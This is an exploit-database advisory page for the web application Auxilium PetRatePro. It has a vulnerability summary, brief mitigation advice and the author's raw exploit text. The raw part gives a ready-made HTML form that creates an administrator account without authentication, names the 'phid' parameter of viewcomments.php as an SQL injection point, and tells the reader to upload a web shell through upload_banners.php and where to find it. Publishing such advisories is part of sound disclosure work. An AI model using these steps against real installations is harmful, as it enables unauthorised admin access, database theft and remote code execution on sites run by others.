Auxilium PetRatePro Multiple Vulnerabilities

vendor:

PetRatePro

by:

DaOne (@LibyanCA)

7,5

CVSS

HIGH

Remote Add Admin, SQL Injection, Remote File Upload

89, 89, 434

CWE

Product Name: PetRatePro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Auxilium PetRatePro Multiple Vulnerabilities

Auxilium PetRatePro is vulnerable to Remote Add Admin, SQL Injection and Remote File Upload. An attacker can exploit the Remote Add Admin vulnerability by creating a new administrator account by submitting a malicious form. The SQL Injection vulnerability can be exploited by passing malicious payloads to the 'phid' parameter of the 'viewcomments.php' page. The Remote File Upload vulnerability can be exploited by uploading a malicious file to the 'upload_banners.php' page.

Mitigation:

Input validation should be performed on all user-supplied data. The application should also be configured to reject files with suspicious extensions. Access to the application should be restricted to trusted users.

Source

Exploit-DB raw data:

##########################################
[~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities
[~] Date: 14/09/2012
[~] Author: DaOne (@LibyanCA)
[~] Software Link: http://www.auxiliumsoftware.com
[~] Google Dork: "N/A"
##########################################

[#] 1-[Remote Add Admin]:

<form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();">
(Create New Administrator)
Username
<input name="username" type="text" id="name" size="20">
Password<input name="upassword" type="text" id="upassword" size="20">
Name<input name="name1" type="text" id="name1" size="20">
Email Address <input name="email" type="text" id="email" size="20">
<input type="submit" value="Create " name="B1">
</form>



[#] 2-[SQL Injection]

viewcomments.php parameter phid

http://localhost/PetRatePro/viewcomments.php?phid=[SQLi]



[#] 3-[Remote File Upload]

Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php
and upload your Shell...
will find files here ... /PetRatePro/banners/shell.php


##########################################
[*] Contact me
www.facebook.com/DaOne.Ly
##########################################